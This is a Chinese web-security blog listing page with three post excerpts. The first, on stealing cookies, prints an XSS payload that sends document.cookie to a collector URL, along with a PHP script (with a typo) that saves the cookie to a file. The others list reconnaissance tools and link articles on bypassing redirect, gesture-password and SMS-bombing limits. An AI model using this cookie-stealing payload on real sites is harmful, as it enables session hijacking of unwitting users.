web安全
Shadow_Flow
web安全,信息安全,网络安全
展开
-
打cookie
注入脚本:<script>document.location='http://127.0.0.1/php.cookie?cookie='+document.cookie;</script>服务端php代码:<?php$cookie = $_GET['cookie'];file_put_contents('cookie.txt',&cookie);?>...原创 2018-03-15 17:49:03 · 179 阅读 · 0 评论 -
信息收集
域名挖掘: 工具 subDomainsBrute Layer子域名挖掘机 在线子域名反查:http://tool.chinaz.com/ http://subdomain.chaxun.lac段查询扫描: Nmap iis PUT Scanmer ...原创 2018-03-29 21:55:54 · 146 阅读 · 0 评论 -
web安全资源
第一篇:绕过URL跳转限制 https://zhuanlan.kanxue.com/article-4354.htm第二篇:绕过APP手势密码验证 http://mp.weixin.qq.com/s/rsnNYbivXuzpfPHr77a5dg第三篇:短信&邮箱轰炸限制绕过 http://mp.weixin.qq.com/s/5OSLC2GOeYere9_lT2RwHw第四篇:挖洞技...原创 2018-04-20 17:01:12 · 371 阅读 · 0 评论